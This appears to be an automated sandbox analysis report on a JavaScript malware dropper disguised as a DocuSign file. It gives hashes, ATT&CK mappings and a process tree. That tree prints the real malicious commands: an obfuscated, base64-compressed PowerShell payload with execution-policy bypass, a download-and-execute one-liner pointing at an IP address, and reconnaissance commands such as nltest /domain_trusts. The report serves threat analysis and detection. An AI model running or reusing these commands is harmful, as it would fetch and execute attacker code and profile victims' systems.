083d4184bc895d803048f375cb821d87f1f5acfa10b9d6057b3e9c9c1ed95d59

Analysis

max time kernel
145s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
01-02-2023 14:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

DocuSign-Feb01-2023.js
Size

44KB
MD5

fb10c8eb9f3346737b08d1d276467f7e
SHA1

62480603ecd4b5e444d9ebf1fbb1ef7ddcbbef99
SHA256

083d4184bc895d803048f375cb821d87f1f5acfa10b9d6057b3e9c9c1ed95d59
SHA512

6734d8454b0355748321dcfc5a2916dce24c371e98cf925a0293daf21c075a99d4d286d2d00821e588c02349038d535bda6eb7c8b4f3aba92b5bbec8a8012e9f
SSDEEP

768:yK0FmWhlhcVcmVs1JsFqk6TmnGT6ePuXSxjRhr:yK0F5hlhcVcauaok6Tg4uOX

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
41	3524	powershell.exe
52	3524	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery

T1057

pid	Process
3264	tasklist.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3192	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
4980	powershell.exe
4980	powershell.exe
3524	powershell.exe
3524	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4980	powershell.exe
Token: SeDebugPrivilege	4240	whoami.exe
Token: SeIncreaseQuotaPrivilege	4980	powershell.exe
Token: SeSecurityPrivilege	4980	powershell.exe
Token: SeTakeOwnershipPrivilege	4980	powershell.exe
Token: SeLoadDriverPrivilege	4980	powershell.exe
Token: SeSystemProfilePrivilege	4980	powershell.exe
Token: SeSystemtimePrivilege	4980	powershell.exe
Token: SeProfSingleProcessPrivilege	4980	powershell.exe
Token: SeIncBasePriorityPrivilege	4980	powershell.exe
Token: SeCreatePagefilePrivilege	4980	powershell.exe
Token: SeBackupPrivilege	4980	powershell.exe
Token: SeRestorePrivilege	4980	powershell.exe
Token: SeShutdownPrivilege	4980	powershell.exe
Token: SeDebugPrivilege	4980	powershell.exe
Token: SeSystemEnvironmentPrivilege	4980	powershell.exe
Token: SeRemoteShutdownPrivilege	4980	powershell.exe
Token: SeUndockPrivilege	4980	powershell.exe
Token: SeManageVolumePrivilege	4980	powershell.exe
Token: 33	4980	powershell.exe
Token: 34	4980	powershell.exe
Token: 35	4980	powershell.exe
Token: 36	4980	powershell.exe
Token: SeIncreaseQuotaPrivilege	4980	powershell.exe
Token: SeSecurityPrivilege	4980	powershell.exe
Token: SeTakeOwnershipPrivilege	4980	powershell.exe
Token: SeLoadDriverPrivilege	4980	powershell.exe
Token: SeSystemProfilePrivilege	4980	powershell.exe
Token: SeSystemtimePrivilege	4980	powershell.exe
Token: SeProfSingleProcessPrivilege	4980	powershell.exe
Token: SeIncBasePriorityPrivilege	4980	powershell.exe
Token: SeCreatePagefilePrivilege	4980	powershell.exe
Token: SeBackupPrivilege	4980	powershell.exe
Token: SeRestorePrivilege	4980	powershell.exe
Token: SeShutdownPrivilege	4980	powershell.exe
Token: SeDebugPrivilege	4980	powershell.exe
Token: SeSystemEnvironmentPrivilege	4980	powershell.exe
Token: SeRemoteShutdownPrivilege	4980	powershell.exe
Token: SeUndockPrivilege	4980	powershell.exe
Token: SeManageVolumePrivilege	4980	powershell.exe
Token: 33	4980	powershell.exe
Token: 34	4980	powershell.exe
Token: 35	4980	powershell.exe
Token: 36	4980	powershell.exe
Token: SeIncreaseQuotaPrivilege	4980	powershell.exe
Token: SeSecurityPrivilege	4980	powershell.exe
Token: SeTakeOwnershipPrivilege	4980	powershell.exe
Token: SeLoadDriverPrivilege	4980	powershell.exe
Token: SeSystemProfilePrivilege	4980	powershell.exe
Token: SeSystemtimePrivilege	4980	powershell.exe
Token: SeProfSingleProcessPrivilege	4980	powershell.exe
Token: SeIncBasePriorityPrivilege	4980	powershell.exe
Token: SeCreatePagefilePrivilege	4980	powershell.exe
Token: SeBackupPrivilege	4980	powershell.exe
Token: SeRestorePrivilege	4980	powershell.exe
Token: SeShutdownPrivilege	4980	powershell.exe
Token: SeDebugPrivilege	4980	powershell.exe
Token: SeSystemEnvironmentPrivilege	4980	powershell.exe
Token: SeRemoteShutdownPrivilege	4980	powershell.exe
Token: SeUndockPrivilege	4980	powershell.exe
Token: SeManageVolumePrivilege	4980	powershell.exe
Token: 33	4980	powershell.exe
Token: 34	4980	powershell.exe
Token: 35	4980	powershell.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 4160 wrote to memory of 4980	4160	wscript.exe	88
PID 4160 wrote to memory of 4980	4160	wscript.exe	88
PID 4980 wrote to memory of 4240	4980	powershell.exe	90
PID 4980 wrote to memory of 4240	4980	powershell.exe	90
PID 4120 wrote to memory of 3524	4120	WScript.exe	92
PID 4120 wrote to memory of 3524	4120	WScript.exe	92
PID 3524 wrote to memory of 4984	3524	powershell.exe	94
PID 3524 wrote to memory of 4984	3524	powershell.exe	94
PID 3524 wrote to memory of 3192	3524	powershell.exe	95
PID 3524 wrote to memory of 3192	3524	powershell.exe	95
PID 3524 wrote to memory of 4848	3524	powershell.exe	98
PID 3524 wrote to memory of 4848	3524	powershell.exe	98
PID 3524 wrote to memory of 620	3524	powershell.exe	99
PID 3524 wrote to memory of 620	3524	powershell.exe	99
PID 3524 wrote to memory of 3264	3524	powershell.exe	100
PID 3524 wrote to memory of 3264	3524	powershell.exe	100

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\DocuSign-Feb01-2023.js
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4160
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EXecutIOnpoLIC bYPAsS "(nEw-OBJect sySteM.IO.CoMprESsIon.DeflAtesTREAM( [SYSTEm.IO.MEMorYSTrEAm][cONvErT]::fRomBase64STRIng( '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') ,[systeM.Io.cOmpresSIoN.CompreSsiOnmODe]::dEcOmPrEsS ) |FOREACh { nEw-OBJect sYStEM.Io.StReaMReaDer( $_,[teXt.EncOdInG]::AsCiI) }| ForeAch { $_.ReAdtoEnd() } ) | &( $psHoME[21]+$pShOme[34]+'X')"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4980
- - C:\Windows\system32\whoami.exe
    "C:\Windows\system32\whoami.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4240

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\302E019ED3D8348D.vbs" "iex (iwr -useb http://46.161.40.72/r/awsru/45D75C2293B6FB62)"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4120
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass iex (iwr -useb http://46.161.40.72/r/awsru/45D75C2293B6FB62)
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:3524
- - C:\Windows\system32\whoami.exe
    "C:\Windows\system32\whoami.exe"
    3⤵
    PID:4984
- - C:\Windows\system32\systeminfo.exe
    "C:\Windows\system32\systeminfo.exe"
    3⤵
    - Gathers system information
    PID:3192
- - C:\Windows\system32\whoami.exe
    "C:\Windows\system32\whoami.exe" /all
    3⤵
    PID:4848
- - C:\Windows\system32\nltest.exe
    "C:\Windows\system32\nltest.exe" /domain_trusts
    3⤵
    PID:620
- - C:\Windows\system32\tasklist.exe
    "C:\Windows\system32\tasklist.exe"
    3⤵
    - Enumerates processes with tasklist
    PID:3264

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:744

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
00e7da020005370a518c26d5deb40691

SHA1
389b34fdb01997f1de74a5a2be0ff656280c0432

SHA256
a529468d442b807290b41565130e4c52760af9abec37613114db3857f11ad4fe

SHA512
9a02bacc6fb922d6202548e80e345c6cdec346b79ef7ac7a56f89fd342ff128de004065b9d010d015b54d4ca72f665ca658c7ffcd8eb906e14bfa5b48b43f2cf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\302E019ED3D8348D.vbs

Filesize
106B

MD5
29814eb775761c5088028d1907f48c55

SHA1
cb369ec71c0a44b9b9411edf956efbb5654ab26e

SHA256
ceb3b2cce642a3dcda3a370c282fd0ae6daf7521a44350d302b4a1351e4ac3db

SHA512
a7ebcab691e6bbe52f150de7e1515f341bab3756c0941fc221d1aa40c54983b73158ff4037b11c18e1fddc2e634ea0fd5ab898cf716b02163c10d98159a7b3c1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
043428a7fc1c42d719da8d29a88100ad

SHA1
00ea71de0e5618b873871ac1e0cc6d198ed53394

SHA256
a3c6af3f2180852514213398282c7a235b1669ad6e3e702bb73e78de4461a994

SHA512
e17ac395a648875b9e07ea0ed8a300c147a844d382191cd0496c811172f40b7cde3b59a777ce3f6facbde409f32107711c3ae6b4a46d1c4cc35e98910a83aab8

Download Submit
memory/620-145-0x0000000000000000-mapping.dmp

Download
memory/3192-142-0x0000000000000000-mapping.dmp

Download
memory/3264-146-0x0000000000000000-mapping.dmp

Download
memory/3524-149-0x00007FFA22600000-0x00007FFA230C1000-memory.dmp

Filesize
10.8MB

Download
memory/3524-148-0x000001922AB30000-0x000001922ACF2000-memory.dmp

Filesize
1.8MB

Download
memory/3524-147-0x00007FFA22600000-0x00007FFA230C1000-memory.dmp

Filesize
10.8MB

Download
memory/3524-138-0x0000000000000000-mapping.dmp

Download
memory/3524-143-0x00007FFA22600000-0x00007FFA230C1000-memory.dmp

Filesize
10.8MB

Download
memory/4240-134-0x0000000000000000-mapping.dmp

Download
memory/4848-144-0x0000000000000000-mapping.dmp

Download
memory/4980-132-0x0000000000000000-mapping.dmp

Download
memory/4980-136-0x00007FFA22600000-0x00007FFA230C1000-memory.dmp

Filesize
10.8MB

Download
memory/4980-135-0x00007FFA22600000-0x00007FFA230C1000-memory.dmp

Filesize
10.8MB

Download
memory/4980-133-0x0000025EAEA30000-0x0000025EAEA52000-memory.dmp

Filesize
136KB

Download
memory/4984-141-0x0000000000000000-mapping.dmp

Download